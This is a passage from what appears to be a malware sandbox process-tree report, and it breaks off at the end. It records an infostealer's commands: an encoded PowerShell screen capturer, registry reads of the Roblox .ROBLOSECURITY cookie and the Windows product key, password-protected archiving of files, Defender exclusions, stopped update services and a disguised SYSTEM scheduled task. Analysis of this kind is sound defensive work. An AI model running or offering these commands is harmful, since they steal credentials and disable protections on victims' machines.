QBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                      8⤵
                                                                                                                        PID:5520
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                          9⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5212
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4o0jfzoi\4o0jfzoi.cmdline"
                                                                                                                            10⤵
                                                                                                                              PID:7904
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9C8.tmp" "c:\Users\Admin\AppData\Local\Temp\4o0jfzoi\CSC6644DACDA7EB447FB84B5F8683B68F.TMP"
                                                                                                                                11⤵
                                                                                                                                  PID:6828
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                            8⤵
                                                                                                                              PID:5648
                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                tree /A /F
                                                                                                                                9⤵
                                                                                                                                  PID:7580
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                8⤵
                                                                                                                                  PID:7624
                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                    tree /A /F
                                                                                                                                    9⤵
                                                                                                                                      PID:7716
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                    8⤵
                                                                                                                                      PID:7812
                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                        tree /A /F
                                                                                                                                        9⤵
                                                                                                                                          PID:8040
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                        8⤵
                                                                                                                                          PID:8056
                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                            tree /A /F
                                                                                                                                            9⤵
                                                                                                                                              PID:8120
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                            8⤵
                                                                                                                                              PID:8132
                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                tree /A /F
                                                                                                                                                9⤵
                                                                                                                                                  PID:8180
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2328"
                                                                                                                                                8⤵
                                                                                                                                                  PID:6040
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /F /PID 2328
                                                                                                                                                    9⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:7148
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4692"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:7112
                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                      taskkill /F /PID 4692
                                                                                                                                                      9⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:7024
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5092"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6408
                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                        taskkill /F /PID 5092
                                                                                                                                                        9⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4312
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5736
                                                                                                                                                        • C:\Windows\system32\getmac.exe
                                                                                                                                                          getmac
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6260
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3936"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:6248
                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                              taskkill /F /PID 3936
                                                                                                                                                              9⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5856
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2696"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5188
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                taskkill /F /PID 2696
                                                                                                                                                                9⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2624
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6436
                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                  taskkill /F /PID 2724
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:6532
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4532"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:6644
                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                    taskkill /F /PID 4532
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:7080
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:7296
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:6548
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:7564
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:5696
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16602\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\t2xAL.zip" *"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:7900
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI16602\rar.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI16602\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\t2xAL.zip" *
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5004
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:8124
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:8120
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic os get Caption
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:6800
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:6788
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic computersystem get totalphysicalmemory
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:8132
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:4400
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic csproduct get uuid
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:5872
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:4316
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:5876
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:3252
                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                              wmic path win32_VideoController get name
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Detects videocard installed
                                                                                                                                                                                              PID:6944
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:5612
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:6028
                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:2860
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:6168
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1688
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop UsoSvc
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:2040
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop WaaSMedicSvc
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5100
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop wuauserv
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:4960
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop bits
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:3328
                                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                                        sc stop dosvc
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:7120
                                                                                                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5868
                                                                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:7164
                                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:208
                                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2876
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:3796
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2040
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5252
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5968
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5272
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:5320
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop bits
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:6420
                                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                    PID:6296
                                                                                                                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                    PID:2724
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1772
                                                                                                                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:6260
                                                                                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5404
                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3572
                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3764
                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3976
                                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4152
                                                                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4868
                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:572
                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3264
                                                                                                                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4524
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2156
                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:644
                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3432
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4160
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2952
                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
